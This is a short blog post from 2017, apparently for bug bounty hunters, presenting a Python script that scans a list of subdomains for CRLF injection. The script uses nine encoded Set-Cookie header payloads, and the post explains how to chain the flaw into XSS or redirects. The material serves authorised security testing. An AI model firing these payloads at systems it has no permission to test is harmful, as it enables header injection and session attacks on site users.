Automating CRLF

Easy Python script to find top-level CRLF bugs.

Automating CRLF Bugs

CRLF is easily detectable because of its ability to set response headers. Detection is as easy as attempting to exploit a web server, and then checking for your unique headers in the response. Let’s look at the steps we will take.

  1. Get full URL of service to test
  2. Add payload at the end of URL
  3. Send GET request to this modified URL
  4. Check for our header in the response code
  5. Go to step 2 until we have tried all of our payloads

In order to find good payloads I looked at openly disclosed bug bounty reports and used all of the unique payloads that I found.

The code

Assuming the company subdomains are in a text file the code to automate this will look like the following:

import requests


# should create Set-Cookie:mycookie=myvalue header if vulnerable
PAYLOADS = [r"%0D%0ASet-Cookie:mycookie=myvalue",
            r"%0d%0aSet-Cookie:mycookie=myvalue",
            r"crlf%0dSet-Cookie:mycookie=myvalue",
            r"crlf%0aSet-Cookie:mycookie=myvalue",
            r"%23%0dSet-Cookie:mycookie=myvalue",
            r"%0dSet-Cookie:mycookie=myvalue",
            r"%0ASet-Cookie:mycookie=myvalue?foo",
            r"%0aSet-Cookie:mycookie=myvalue",
            r"/xxx%0ASet-Cookie:mycookie=myvalue;"]

# protocol either 'http://' or 'https://'
def crlf(protocol, subdomain):
    for payload in PAYLOADS:
        try:
            r = requests.get("%s%s/%s" % (protocol, subdomain, payload), verify=False, timeout=.5, allow_redirects=False)
            for name in r.cookies.keys():
                if "mycookie" in name:
                    print "[+] Vulnerable: %s%s/%s" % (protocol, subdomain, payload)
        except requests.Timeout:
            print "\tTimeout"
            return False
        except Exception as e:
            print "ERROR STRING: %s%s:8443/%s" % (protocol, subdomain, payload)
            print str(e)

if __name__ == "__main__":
	with open("bug_bounty.txt", "r") as f:
		for subdomain in f:
			crlf("https://", subdomain)

More information

This code will work on a text file called “bug_bounty.txt” that is in the same directory as it. The text file needs to be formatted as having one subdomain per line. For instance, a valid text file would look like the following:

www.google.com
developer.google.com

Then, the code will attempt to exploit each subdomain by appending the appropriate protocol (https or http) by specifying it under the main definition, modify it yourself to try HTTP instead of HTTPS.

You might be lucky to get paid just for this bug, but usually it doesn’t pay. You can turn it into a chained vulnerability if you can locate a cookie being accessed insecurely. Then, you can set that cookie to your payload and then nagivate to the other page to have XSS or URL redirection fire.

Good luck hunting!

Written on March 20, 2017